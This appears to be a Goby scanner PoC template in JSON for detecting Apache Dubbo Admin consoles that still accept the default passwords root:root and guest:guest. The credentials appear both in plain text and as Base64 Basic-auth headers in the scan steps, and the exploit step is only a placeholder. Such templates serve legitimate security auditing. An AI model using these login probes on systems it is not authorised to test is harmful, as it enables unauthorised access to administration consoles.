Goby/json/Apache_Dubbo_Admin_Default_...

152 lines
5.8 KiB
JSON
Raw Normal View History

2022-11-25 02:08:58 -08:00
{
"Name": "Apache Dubbo Admin Default Password",
"Level": "2",
"Tags": [
"defaultaccount"
],
"GobyQuery": "app=\"APACHE-dubbo\"",
"Description": "Apache Dubbo is a high-performance, java based open source RPC framework.",
"Product": "Apache Dubbo",
"Homepage": "https://dubbo.apache.org/",
"Author": "",
"Impact": "The Apache Dubbo Admin management console has default passwords root:root and guest:guest.",
"Recommendation": "",
"References": [
"https://www.cnblogs.com/wishwzp/p/9438658.html",
"https://github.com/chaitin/xray/blob/master/pocs/dubbo-admin-default-password.yml"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {
"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<title>Dubbo Admin</title>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "/sysinfo/versions",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {
"Authorization": "Basic cm9vdDpyb290"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<title>Dubbo Admin</title>",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "/sysinfo/versions",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}